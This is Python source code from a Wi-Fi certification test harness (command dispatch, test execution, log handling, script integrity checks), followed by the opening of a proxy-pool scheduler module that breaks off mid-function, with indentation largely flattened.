GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
else:
self.usr_in_cmd = item.cmd
self.start_test_run(item)
#self.is_running = False
#break
elif isinstance(item.cmd, UserQueryCommand):
cmd_str = item.cmd.cmd_name
#print "**************** %s *******************" % cmd_str
if cmd_str in self.req_hdl_dict:
run_status = TestFlowController.get_test_flow_status()
if run_status == TestFlowController.TEST_FLOW_STATUS_RUNNING:
if cmd_str == UserCommand.SET_CURRENT_USER_MODE or cmd_str == UserCommand.SET_DEFAULT_USER_MODE:
resp_item = item
resp_item.cmd.status = UserCommand.ERROR
resp_item.cmd.err_msg = "Test case %s currently running, cannot complete the request" % GlobalConfigFiles.curr_tc_name
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
continue
self.req_hdl_dict[cmd_str](item)
#if not (run_status == TestFlowController.TEST_FLOW_STATUS_RUNNING):
# self.is_running = False
# break
else:
logging.error("Unknown command - %s ###" % cmd_str)
resp_item = item
resp_item.cmd.status = UserCommand.INVALID
resp_item.cmd.err_msg = "User command not identified"
##print resp_item
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
else:
#print "######################### in while"
pass
time.sleep(1)
def start_test_run(self, item):
"""Handles the request to start test.
"""
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
resp_item.cmd.status = UserCommand.COMPLETE
#print "*********************** start to run test ********************"
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
def stop_test_run(self):
"""Handles stop test run request.
"""
self.is_running = False
def get_wts_ver(self, item=None):
"""Gets the WTS version.
"""
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
resp_item.cmd.status = UserCommand.COMPLETE
resp_item.cmd.result = GlobalConfigFiles.VERSION
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
def get_default_user_mode(self, item=None):
"""Gets the default user mode.
Args:
item (object): The object of UserInteractQueueItem class.
"""
default_mode = self.user_mode.get_default_mode()
#print "*********************** get default user mode %s ********************" % default_mode
if item is not None:
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
resp_item.cmd.status = UserCommand.COMPLETE
resp_item.cmd.result = default_mode
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
else:
return default_mode
def get_curr_user_mode(self, item=None):
"""Gets the current user mode.
Args:
item (object): The object of UserInteractQueueItem class.
"""
curr_mode = self.user_mode.get_current_mode()
#print "*********************** get current user mode %s ********************" % curr_mode
if item is not None:
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
resp_item.cmd.status = UserCommand.COMPLETE
resp_item.cmd.result = curr_mode
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
else:
return curr_mode
def set_default_user_mode(self, item):
"""Sets the default user mode.
Args:
item (object): The object of UserInteractQueueItem class.
"""
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
if item.cmd.mode != "":
ret_val = self.user_mode.set_default_mode(item.cmd.mode)
if ret_val == -1:
resp_item.cmd.status = UserCommand.INVALID
resp_item.cmd.err_msg = "invalid mode, please check"
else:
resp_item.cmd.status = UserCommand.COMPLETE
else:
resp_item.cmd.status = UserCommand.ERROR
resp_item.cmd.err_msg = "test flow controller error: parameter is empty"
#print "*********************** set default user mode done ********************"
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
def set_curr_user_mode(self, item):
"""Sets the current user mode.
Args:
item (object): The object of UserInteractQueueItem class.
"""
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
if item.cmd.mode != "":
ret_val = self.user_mode.set_current_mode(item.cmd.mode)
if ret_val == "-1":
resp_item.cmd.status = UserCommand.INVALID
resp_item.cmd.err_msg = "invalid mode, please check"
else:
resp_item.cmd.status = UserCommand.COMPLETE
else:
resp_item.cmd.status = UserCommand.ERROR
resp_item.cmd.err_msg = "test flow controller error: parameter is empty"
#print "*********************** set current user mode done ********************"
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
def show_user_mode(self, item):
"""Displays all available user modes.
Args:
item (object): The object of UserInteractQueueItem class.
"""
all_user_modes = self.user_mode.get_available_modes()
resp_item = UserInteractQueueItem()
resp_item.itemId = item.itemId
resp_item.cmd = item.cmd
resp_item.cmd.status = UserCommand.COMPLETE
resp_item.cmd.result = all_user_modes
#print "*********************** %s ********************" % all_user_modes
GlobalConfigFiles.usr_resp_que.enqueue(resp_item)
def check_user_mode_permission(self, feat):
"""Checks user mode permission for a specific feature.
Args:
feat (str): The string of user mode feature.
"""
return self.user_mode.check_feature(feat)
class TestFlowController:
    """A class to control test flow including configuration and execution.
Attributes:
capi_script_parser (object): The object of TestScriptParser class.
xml_file_parser (object): The object of XmlFileParser class.
test_mngr_initr (object): The object of TestManagerInitializer class.
        usr_input_handle_thr (object): The user input command handling thread object.
usr_action_cls (object): The object of UserRequestAction class.
executor_inst (object): The object of Executor class.
"""
TEST_FLOW_STATUS_RUNNING = "RUNNING"
TEST_FLOW_STATUS_NOTSTART = "NOTSTART"
TEST_FLOW_STATUS_EXECUTING = "EXECUTING"
capi_script_parser = None
xml_file_parser = None
test_mngr_initr = None
usr_input_handle_thr = None
usr_action_cls = None
executor_inst = None
file_busy = None
start_time = None
@staticmethod
def reset_test_environment():
"""Resets test execution environment.
"""
TestFlowController.test_mngr_initr.test_case_mngr = None
TestFlowController.test_mngr_initr.test_script_mngr = None
TestFlowController.test_mngr_initr.test_config_info_mngr.sll = None
TestFlowController.test_mngr_initr.testbed_dev_mngr.ill = None
TestFlowController.test_mngr_initr.test_data_strm_mngr = None
TestFlowController.test_mngr_initr.test_prog_mngr = None
TestFlowController.test_mngr_initr.test_feat_mngr = None
TestFlowController.test_mngr_initr.test_configurator = None
TestFlowController.test_mngr_initr.test_config_cxt = None
TestFlowController.test_mngr_initr.test_config_service = None
core.parser.TestScriptParser.qll = None
core.parser.TestScriptParser.ill = None
TestLogFileSource.log_file_source_obj_list = []
core.parser.TestScriptParser.sub_file_call_dict = {}
TestLogFileSource.log_file_hdl_list = []
TestLogFileSource.log_file_source_obj_list = []
core.parser.test_script_sym_tab = {"ifCondBit" : True, "socktimeout" : 60, "iDNB" : 0, "testRunning" : 0, "threadCount" : 0}
core.parser.capi_cmd_ret_sym_tab = {}
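    # Group runs iterate over the test case ids listed in the group file,
    # initializing, running and resetting the environment for each one; a single
    # run performs the same sequence for one test case id.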
@staticmethod
def start_test_execution_controller(usr_in_cmd):
"""Starts test case execution as either a group or a single case
Args:
usr_in_cmd (object): The object of UserCommand class.
"""
GlobalConfigFiles.curr_prog_name = usr_in_cmd.prog_name
if usr_in_cmd.is_group_run:
if os.path.exists(usr_in_cmd.group_file_name):
                with open(usr_in_cmd.group_file_name, 'r') as grp_files:
                    for tc in grp_files:
                        if not tc:
                            break
                        tc = tc.strip()
                        usr_in_cmd.test_case_id = tc
                        if TestFlowController.test_mngr_initr is not None:
                            TestFlowController.test_mngr_initr.tc_name = tc
                        TestFlowController.initialize_test_environment(usr_in_cmd)
                        GlobalConfigFiles.curr_tc_name = tc
                        TestFlowController.run_test_case(usr_in_cmd)
                        TestFlowController.reset_test_environment()
            else:
                raise OSError(usr_in_cmd.group_file_name + " does not exist")
else:
GlobalConfigFiles.curr_tc_name = usr_in_cmd.test_case_id
#===================================================================
# if usr_in_cmd.is_testcase_val:
# TestFlowController.initialize_test_environment(usr_in_cmd)
# TestFlowController.run_test_case(usr_in_cmd)
# TestFlowController.reset_test_environment()
# usr_in_cmd.is_testcase_val = False
#===================================================================
TestFlowController.initialize_test_environment(usr_in_cmd)
TestFlowController.run_test_case(usr_in_cmd)
TestFlowController.reset_test_environment()
@staticmethod
def initialize_test_environment(usr_in_cmd):
"""Initializes test execution environment including domain object managers.
Args:
usr_in_cmd (object): The object of UserCommand class.
"""
if TestFlowController.test_mngr_initr == None:
TestFlowController.test_mngr_initr = core.initializer.TestManagerInitializer(usr_in_cmd.prog_name, usr_in_cmd.test_case_id)
TestFlowController.test_mngr_initr.init_test_config_context(usr_in_cmd)
# gets the current user mode
TestFlowController.test_mngr_initr.test_config_cxt.user_mode = TestFlowController.usr_action_cls.get_curr_user_mode()
if TestFlowController.test_mngr_initr.test_config_cxt.user_mode != "precert":
#TestFlowController.test_mngr_initr.test_config_cxt.is_testbed_validation_set = TestFlowController.usr_action_cls.check_user_mode_permission("validation")
TestFlowController.test_mngr_initr.test_config_cxt.is_app_id_set = TestFlowController.usr_action_cls.check_user_mode_permission("app_id")
TestFlowController.test_mngr_initr.test_config_cxt.is_script_protection_set = TestFlowController.usr_action_cls.check_user_mode_permission("script_protection")
TestFlowController.test_mngr_initr.test_config_cxt.is_result_protection_set = TestFlowController.usr_action_cls.check_user_mode_permission("result_protection")
TestFlowController.test_mngr_initr.test_config_cxt.is_edit_script_flag_set = TestFlowController.usr_action_cls.check_user_mode_permission("edit_scripts")
TestFlowController.test_mngr_initr.init_test_manager()
TestFlowController.test_mngr_initr.init_testbed_device()
if TestFlowController.test_mngr_initr.test_config_cxt.is_testcase_ignored: return
TestFlowController.test_mngr_initr.init_test_case()
@staticmethod
def run_test_case(usr_in_cmd):
"""Executes a single test case
Args:
usr_in_cmd (object): The object of UserCommand class.
"""
try:
TestFlowController.prepare_log_files(usr_in_cmd)
core.parser.TestScriptParser.sub_file_call_dict["%s:%s:1" % (TestFlowController.test_mngr_initr.test_script_mngr.test_case_file, TestFlowController.test_mngr_initr.test_script_mngr.test_case_file)] = 1
test_file_source_facotry_list = TestFlowController.get_config_files_list(usr_in_cmd)
for test_file_source_facotry in test_file_source_facotry_list:
test_file_source = test_file_source_facotry.file_factory_method()
if test_file_source_facotry.file_type == "TXT":
for tc in TestFlowController.test_mngr_initr.test_prog_mngr.test_prog.tc_list:
if test_file_source_facotry.file_name == tc.tc_name:
TestFlowController.test_mngr_initr.test_config_cxt.is_test_case_file = True
#TestFlowController.print_config_files_info(test_file_source_facotry.file_name, usr_in_cmd.test_case_id)
break
TestFlowController.print_config_files_info(test_file_source_facotry.file_name, TestFlowController.test_mngr_initr.test_config_cxt.is_test_case_file)
if test_file_source_facotry.file_name == GlobalConfigFiles.dut_info_file:
TestLogFileSource.log_file_source_obj_list[0].write_log_message("Read DUT Info Function", TestLogFileSource.log_file_hdl_list[0])
if test_file_source_facotry.file_name == GlobalConfigFiles.init_config_file:
TestFlowController.test_mngr_initr.test_config_cxt.is_all_init_config_file = True
#TestFlowController.print_config_files_info(test_file_source_facotry.file_name)
if test_file_source_facotry.file_name == GlobalConfigFiles.init_cmd_file or test_file_source_facotry.file_name == GlobalConfigFiles.device_id_file:
TestFlowController.test_mngr_initr.test_config_cxt.is_all_init_command_file = True
TestFlowController.capi_script_parser = core.parser.TestScriptParserFactory.create_parser(test_file_source, TestFlowController.test_mngr_initr)
TestFlowController.test_mngr_initr.test_configurator.configure(TestFlowController.test_mngr_initr, TestFlowController.capi_script_parser)
if TestFlowController.test_mngr_initr.test_config_cxt.is_all_init_command_file:
TestFlowController.test_mngr_initr.test_config_cxt.is_all_init_config_file = False
TestFlowController.test_mngr_initr.test_config_cxt.is_all_init_command_file = False
if test_file_source_facotry.file_type == "XML":
TestFlowController.print_config_files_info(test_file_source_facotry.file_name, TestFlowController.test_mngr_initr.test_config_cxt.is_test_case_file)
xml_file_parser = core.parser.TestScriptParserFactory.create_parser(test_file_source, TestFlowController.test_mngr_initr, True)
TestFlowController.test_mngr_initr.test_configurator.configure(TestFlowController.test_mngr_initr, xml_file_parser)
# end of for loop
if usr_in_cmd.is_testbed_val or usr_in_cmd.is_testcase_val:
TestLogFileSource.log_file_source_obj_list[0].close_log_file(TestLogFileSource.log_file_hdl_list[0]) # TestLogFileSource.log_file_hdl_list[0]
else:
TestLogFileSource.log_file_source_obj_list[0].close_log_file(TestLogFileSource.log_file_hdl_list[0]) # TestLogFileSource.log_file_hdl_list[0]
TestLogFileSource.log_file_source_obj_list[1].close_log_file(TestLogFileSource.log_file_hdl_list[1]) # TestLogFileSource.log_file_hdl_list[1]
TestLogFileSource.log_file_source_obj_list[3].close_log_file(TestLogFileSource.log_file_hdl_list[3])
if TestFlowController.test_mngr_initr.test_config_cxt.is_script_protection_set:
TestFlowController.check_file_integrity()
logging.debug("Executor start...")
count = 0
currNode = TestFlowController.capi_script_parser.qll.head
while currNode is not None:
logging.debug("TAG: " + currNode.tag)
logging.debug(currNode.data)
logging.debug("\n")
#print "GROUP_TAG: " + currNode.group_tag
#print "\n"
currNode = currNode.next
count += 1
logging.debug("the count %s" % str(count))
executor_inst = Executor()
executor_inst.parallel_enable = True
if usr_in_cmd.is_testbed_val or usr_in_cmd.is_testcase_val:
executor_inst.construct_valiadate_q(TestFlowController.test_mngr_initr,
TestFlowController.capi_script_parser,
TestFlowController.test_mngr_initr)
else:
executor_inst.construct_exec_q(TestFlowController.test_mngr_initr,
TestFlowController.capi_script_parser,
TestFlowController.test_mngr_initr)
tbd_list = TestFlowController.test_mngr_initr.test_config_service.get_test_prog_tbd_list("APConfig", "APCONFIG")
if len(tbd_list) == 1:
num_of_aps = 0
if not (TestFlowController.test_mngr_initr.test_config_cxt.is_testbed_validation_set or TestFlowController.test_mngr_initr.test_config_cxt.is_testcase_validation_set):
#for ap in executor_inst.involved_ap_list:
ap_list = TestFlowController.test_mngr_initr.test_config_service.get_test_prog_tbd_list("", "AP")
for ap in ap_list:
logging.debug("%s[%s:%s:%s]" % (ap.dev_name, ap.ctrlipaddr, ap.ctrlport, ap.testipaddr))
if ap.ctrlipaddr == "" and ap.testipaddr != "":
num_of_aps += 1
if ap.ctrlipaddr == tbd_list[0].ctrlipaddr:# and ap.ctrlport == tbd_list[0].ctrlport:
num_of_aps += 1
ps_list = TestFlowController.test_mngr_initr.test_config_service.get_test_prog_tbd_list("PowerSwitch", "POWERSWITCH")
for ps in ps_list:
if ps.ctrlipaddr != "":
num_of_aps += 1
if num_of_aps > 0:
reply = ""
try:
net_cli = NetCommClient(AF_INET,SOCK_STREAM)
net_cli.networkClientSockConnect(tbd_list[0].ctrlipaddr, '8800')
data = "startport=%s" % tbd_list[0].ctrlport + ",numofaps=%s" % num_of_aps
NetCommServer.SOCK_READABLE.remove(net_cli.sock)
NetCommServer.SOCK_WAIT.remove(net_cli.sock)
net_cli.networkClientSockSend(data)
net_cli.networkClientSockTimeout(240)
reply = net_cli.networkClientSockRecv(1024)
except:
if re.search(r"status,ERROR", reply):
logging.error(reply)
#print error msg instead of raise exception..
logging.info("=============================================")
logging.info("Please check AP config agent is running.")
logging.info("END: TEST CASE [%s] " % usr_in_cmd.test_case_id)
elapsed = (time.time() - TestFlowController.start_time)
logging.info("Execution Time [%s] seconds" % round(elapsed,2))
return
#raise Exception(reply)
time.sleep(num_of_aps)
executor_inst.process_exec_q()
#executor_inst.display_completed_q()
if usr_in_cmd.is_testbed_val or usr_in_cmd.is_testcase_val:
tbd_list = TestFlowController.test_mngr_initr.test_prog_mngr.test_prog.testbed_dev_list
program = TestFlowController.test_mngr_initr.prog_name
v = Validation()
ts = v.get_latest_result_session()
if ts is not None:
logging.info('Last validation was at: %s' % str(ts.get('timestamp')))
v.commence_validation(program, tbd_list)
display_val_result.display_validation_res()
return
#logging.info("END: TEST CASE [%s] " % usr_in_cmd.test_case_id)
elapsed = (time.time() - TestFlowController.start_time)
logging.info("Execution Time [%s] seconds" % round(elapsed,2))
#===================================================================
# if TestFlowController.test_mngr_initr.test_config_cxt.is_result_protection_set:
# TestFlowController.get_curr_log_file()
# TestFlowController.save_log_sig()
#===================================================================
except TestScriptVerificationError as tsve:
logging.error(tsve)
raise
except Exception:
# instance.__class__ is the exception class
logging.error('Exception caught!', exc_info=True)
finally:
if usr_in_cmd.is_testbed_val or usr_in_cmd.is_testcase_val:
return
TestLogFileSource.log_file_source_obj_list[2].close_log_file(TestLogFileSource.log_file_hdl_list[2])
if TestFlowController.test_mngr_initr.test_config_cxt.is_result_protection_set:
TestFlowController.get_curr_log_file()
TestFlowController.save_log_sig()
TestFlowController.file_busy.stop_logging()
            root_logger = logging.getLogger()
            for handler in list(root_logger.handlers):
                handler.close()
                root_logger.removeHandler(handler)
@staticmethod
    def print_config_files_info(file_name, is_test_case_file=False):
        """Logs information about the configuration or test case file being processed.
        """
if is_test_case_file:
logging.info("\n %7s Testcase Command File = %s \n" % ("", file_name))
logging.info("START: TEST CASE [%s] " % file_name)
if file_name == GlobalConfigFiles.init_config_file:
logging.info("\n %7s Testcase Init File = %s \n" % ("", file_name))
logging.info("Processing %s file...." % file_name)
logging.info("---------------------------------------\n")
@staticmethod
    def get_config_files_list(usr_in_cmd):
        """Builds the ordered list of configuration and test script file sources to parse for this run.
        """
test_file_source_facotry_list = []
if usr_in_cmd.prog_name == "AC-11AG" or usr_in_cmd.prog_name == "AC-11B" or usr_in_cmd.prog_name == "AC-11N":
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_config_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_cmd_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(TestFlowController.test_mngr_initr.test_script_mngr.test_case_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
return test_file_source_facotry_list
if usr_in_cmd.is_testbed_val or usr_in_cmd.is_testcase_val:
if usr_in_cmd.is_testcase_val:
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.dut_info_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.master_test_info_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_config_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.device_id_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
else:
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.dut_info_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.master_test_info_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_config_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_cmd_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
test_file_source_facotry_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(TestFlowController.test_mngr_initr.test_script_mngr.test_case_file, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path))
return test_file_source_facotry_list
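    # Log file slots created in prepare_log_files(): [0] init config log,
    # [1] pre-test log, [2] per-test-case log, [3] HTML report; validation runs
    # only create slot [0].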
@staticmethod
def prepare_log_files(usr_in_cmd):
"""Prepares the log files by initializing handles first and creating files after.
"""
if usr_in_cmd.is_testbed_val or usr_in_cmd.is_testcase_val:
TestLogFileSource.log_file_source_obj_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_config_log_file, "").file_factory_method())
TestLogFileSource.log_file_source_obj_list[0].create_log_file() # TestLogFileSource.log_file_hdl_list[0]
else:
logging.info("\n*** Running Test - %s *** \n" % usr_in_cmd.test_case_id)
TestLogFileSource.log_file_source_obj_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.init_config_log_file, "").file_factory_method())
TestLogFileSource.log_file_source_obj_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.pre_test_log_file, "").file_factory_method())
TestLogFileSource.log_file_source_obj_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(usr_in_cmd.test_case_id + ".log", "").file_factory_method())
TestLogFileSource.log_file_source_obj_list.append(scriptinfo.scriptsource.TestFileSourceFacotry(GlobalConfigFiles.html_file, "").file_factory_method())
TestLogFileSource.log_file_source_obj_list[0].create_log_file() # TestLogFileSource.log_file_hdl_list[0]
TestLogFileSource.log_file_source_obj_list[1].create_log_file() # TestLogFileSource.log_file_hdl_list[1]
U = "\n Test ID = [%s] CmdPath = [%s] Prog Name = [%s] initFile =[%s] TBFile =[%s]" % (usr_in_cmd.test_case_id, TestFlowController.test_mngr_initr.test_script_mngr.prog_script_folder_path, usr_in_cmd.prog_name, GlobalConfigFiles.init_config_file, TestFlowController.test_mngr_initr.test_script_mngr.testbed_ap_file)
TestLogFileSource.log_file_source_obj_list[2].init_logging(GlobalConfigFiles.LOG_LEVEL)
TestLogFileSource.log_file_source_obj_list[3].create_log_file()
logging.info("\n Test Info %s" % U)
@staticmethod
def check_file_integrity():
"""Checks the integrity of config files and test script files.
"""
config_file_list = TestFlowController.get_config_file_call_list()
tc_file_list = TestFlowController.get_tc_file_call_list()
file_security_obj = ScriptsSecurity()
for filename in config_file_list:
            # allow the validation of a configuration file to fail
file_security_obj.validate_single_file(GlobalConfigFiles.curr_prog_name, filename)
for filename in tc_file_list:
tc_vrf_rslt = file_security_obj.validate_single_file(GlobalConfigFiles.curr_prog_name, filename)
if not TestFlowController.test_mngr_initr.test_config_cxt.is_edit_script_flag_set:
if tc_vrf_rslt:
raise TestScriptVerificationError("Script file %s verification failed [current mode %s]" % (filename, TestFlowController.test_mngr_initr.test_config_cxt.user_mode))
@staticmethod
def get_config_file_call_list():
"""Gets a list of config files associated with current test case.
"""
config_file_list = []
config_file_list.append(GlobalConfigFiles.dut_info_file)
config_file_list.append(GlobalConfigFiles.master_test_info_file)
config_file_list.append(GlobalConfigFiles.init_config_file)
config_file_list.append(GlobalConfigFiles.init_cmd_file)
file_chain_dict = sorted(core.parser.TestScriptParser.sub_file_call_dict.items(), key=itemgetter(1))
for fp in file_chain_dict:
#print fp[0]
curr_parent = fp[0].split(':')[0]
curr_child = fp[0].split(':')[1]
curr_indx = fp[0].split(':')[2]
#print "curr_index=%s" % curr_indx
if curr_parent == GlobalConfigFiles.init_config_file or curr_parent == GlobalConfigFiles.init_cmd_file:
if curr_child == GlobalConfigFiles.init_env_file:
continue
config_file_list.append(curr_child)
return config_file_list
@staticmethod
def get_tc_file_call_list():
"""Gets a list of script files associated with current test case.
"""
file_chain_list = []
file_chain_dict = sorted(core.parser.TestScriptParser.sub_file_call_dict.items(), key=itemgetter(1))
for fp in file_chain_dict:
#print fp[0]
curr_parent = fp[0].split(':')[0]
curr_child = fp[0].split(':')[1]
curr_indx = fp[0].split(':')[2]
#print "curr_index=%s" % curr_indx
#if curr_parent in file_chain_list or curr_child in file_chain_list:
# continue
if curr_parent == GlobalConfigFiles.init_config_file or curr_parent == GlobalConfigFiles.init_cmd_file:
continue
if curr_parent == curr_child:
file_chain_list.append(curr_parent)
else:
if curr_parent in file_chain_list and not curr_child in file_chain_list:
file_chain_list.append(curr_child)
if not curr_parent in file_chain_list and curr_child in file_chain_list:
file_chain_list.append(curr_parent)
if not curr_parent in file_chain_list and not curr_child in file_chain_list:
file_chain_list.append(curr_parent)
file_chain_list.append(curr_child)
return file_chain_list
@staticmethod
def get_curr_log_file():
"""Unlocks the current test log file.
"""
TestFlowController.file_busy = ReadFileBusy()
TestFlowController.file_busy.write_string_to_file()
@staticmethod
def save_log_sig():
"""Saves the signature of current test log file to database.
"""
log_file_path = TestScriptSymbolTable.get_value_from_sym_tab("$logFullPath", TestScriptSymbolTable.test_script_sym_tab)
history = historydb.History(GlobalConfigFiles.curr_prog_name, GlobalConfigFiles.curr_tc_name, TestFlowController.test_mngr_initr.test_config_cxt.user_mode, log_file_path)
history_service = historydb.HistoryService(history)
sig = TestFlowController.file_busy.get_file_sig()
#history_service.updateHistoryByLogSig(sig)
#####################################################
blob = TestFlowController.file_busy.set_blob_data()
digest = TestFlowController.file_busy.get_log_digest()
history_service.updateHistoryByLogOuput(blob, sig, digest)
@staticmethod
def get_test_flow_status():
"""Obtains the current test flow status
"""
if TestFlowController.test_mngr_initr is None:
return TestFlowController.TEST_FLOW_STATUS_NOTSTART
else:
if not TestFlowController.executor_inst.mainExecQ.is_empty():
return TestFlowController.TEST_FLOW_STATUS_EXECUTING
else:
return TestFlowController.TEST_FLOW_STATUS_RUNNING
def main():
fec = FrontendCli('AC-11AG AC-11B AC-11N HS2 HS2-R2 N P2P PMF TDLS WFD WMM WPA2 WFDS VHT WMMPS NAN VE')
#sys.argv = ['uwts_ucc.exe', 'WFD', 'WFD-6.1.21B'] #HS2-4.15 HS2-5.6-A
#sys.argv = ['uwts_ucc.exe', '-p', 'VHT', '-t', 'VHT-5.2.1']
#sys.argv = ['uwts_ucc.exe', '-p', 'VHT', '-val']
#sys.argv = ['uwts_ucc.exe', '-p', 'VHT', '-t', 'VHT-5.2.1', '--set-current-usermode', 'matl-mrcl']
#sys.argv = ['uwts_ucc.exe', '-p', 'VHT', '--set-current-usermode', 'atl']
#sys.argv = ['uwts_ucc.exe', '-p', 'VHT', '-t', 'VHT-5.2.1', '-val']
#sys.argv = ['uwts_ucc.exe', '--show-usermode']
#sys.argv = ['uwts_ucc.exe', '-v']
#sys.argv = ['uwts_ucc.exe', '--get-current-usermode']
#sys.argv = ['uwts_ucc.exe', '--set-default-usermode', 'atl']
#sys.argv = ['uwts_ucc.exe', '--set-current-usermode', 'atl']
#print sys.argv
check_cmd_result = fec.fec_register_cmd().fec_check_cli_cmd(sys.argv)
if check_cmd_result is not None and not isinstance(check_cmd_result, argparse.Namespace):
logging.error("Error in command line parse")
exit(1)
GlobalConfigFiles.usr_req_que = UserInteractQueue("REQUEST")
GlobalConfigFiles.usr_resp_que = UserInteractQueue("RESPONSE")
output_str = fec.check_instance(sys.argv)
if output_str != "Start":
return
#register the Queue for FrontendCli
if fec is not None:
#start the tcp server here after one successful cli command
fec_server = FrontendCliServer()
fec_server.register_parent(fec).register_QCB(Cli_Fl_ctrl_req_Q=GlobalConfigFiles.usr_req_que, \
Cli_Fl_ctrl_resp_Q=GlobalConfigFiles.usr_resp_que)
fec_server.start()
else:
logging.error("Remote command not able to activate")
if fec.testProgName is not None:
prog_name = fec.testProgName[0]
#print "progName : " + prog_name
if fec.testCaseName is not None:
script_name = fec.testCaseName[0]
#print "scriptName : " + script_name
Util.get_wts_build_version()
TestFlowController.usr_action_cls = UserRequestAction()
TestFlowController.usr_input_handle_thr = threading.Thread(target=TestFlowController.usr_action_cls.user_request_dispatcher)
TestFlowController.usr_input_handle_thr.start()
fec.handle_cli_cmd(sys.argv)
TestFlowController.start_time = time.time()
timeout = 5
while time.time() < TestFlowController.start_time + timeout:
#print "diff time %s" % (time.time() - start_time)
if TestFlowController.usr_action_cls.usr_in_cmd is not None:
#if prog_name == "AC-11AG" or prog_name == "AC-11B" or prog_name == "AC-11N":
# TestFlowController.usr_action_cls.usr_in_cmd.prog_name = "WMM-AC"
# prog_name = "WMM-AC"
GlobalConfigFiles.init_cmd_file = GlobalConfigFiles.init_cmd_file.replace("##", prog_name)
GlobalConfigFiles.init_config_file = GlobalConfigFiles.init_config_file.replace("##", prog_name)
try:
TestFlowController.start_test_execution_controller(TestFlowController.usr_action_cls.usr_in_cmd)
if TestFlowController.usr_action_cls.usr_in_cmd.is_testbed_val or TestFlowController.usr_action_cls.usr_in_cmd.is_testcase_val:
break
except TestScriptVerificationError:
logging.error("Aborting the test....", exc_info=False)
#logging.error("%s Aborting the test...." % sys.exc_info()[1])
break
except:
logging.error('caught:', exc_info=True)
break
else:
break
TestFlowController.usr_action_cls.is_running = False
TestFlowController.usr_input_handle_thr.join()
if fec_server is not None:
fec_server.stop_server()
fec_server.join()
if __name__ == "__main__":
main()
|
scheduler.py
|
import multiprocessing
import time
from loguru import logger
from proxypool.processors.getter import Getter
from proxypool.processors.server import app
from proxypool.processors.tester import Tester
from proxypool.setting import CYCLE_GETTER, CYCLE_TESTER, API_HOST, API_THREADED, API_PORT, ENABLE_SERVER, \
ENABLE_GETTER, ENABLE_TESTER, IS_WINDOWS
if IS_WINDOWS:
multiprocessing.freeze_support()
tester_process, getter_process, server_process = None, None, None
class Scheduler():
"""
scheduler
"""
def run_tester(self, cycle=CYCLE_TESTER):
"""
run tester
"""
if not ENABLE_TESTER:
logger.info('tester not enabled, exit')
return
tester = Tester()
loop = 0
while True:
logger.debug(f'tester loop {loop} start...')
tester.run()
loop += 1
time.sleep(cycle)
def run_getter(self, cycle=CYCLE_GETTER):
"""
run getter
"""
if not ENABLE_GETTER:
logger.info('getter not enabled, exit')
return
getter = Getter()
loop = 0
while True:
logger.debug(f'getter loop {loop} start...')
getter.run()
loop += 1
time.sleep(cycle)
def run_server(self):
"""
run server for api
"""
if not ENABLE_SERVER:
logger.info('server not enabled, exit')
return
app.run(host=API_HOST, port=API_PORT, threaded=API_THREADED)
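    # run() spawns one child process per enabled component (tester, getter, API
    # server), waits on them, and terminates all of them on KeyboardInterrupt.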
def run(self):
global tester_process, getter_process, server_process
try:
logger.info('starting proxypool...')
            if ENABLE_TESTER:
                tester_process = multiprocessing.Process(target=self.run_tester)
                tester_process.start()
                logger.info(f'started tester, pid {tester_process.pid}...')
            if ENABLE_GETTER:
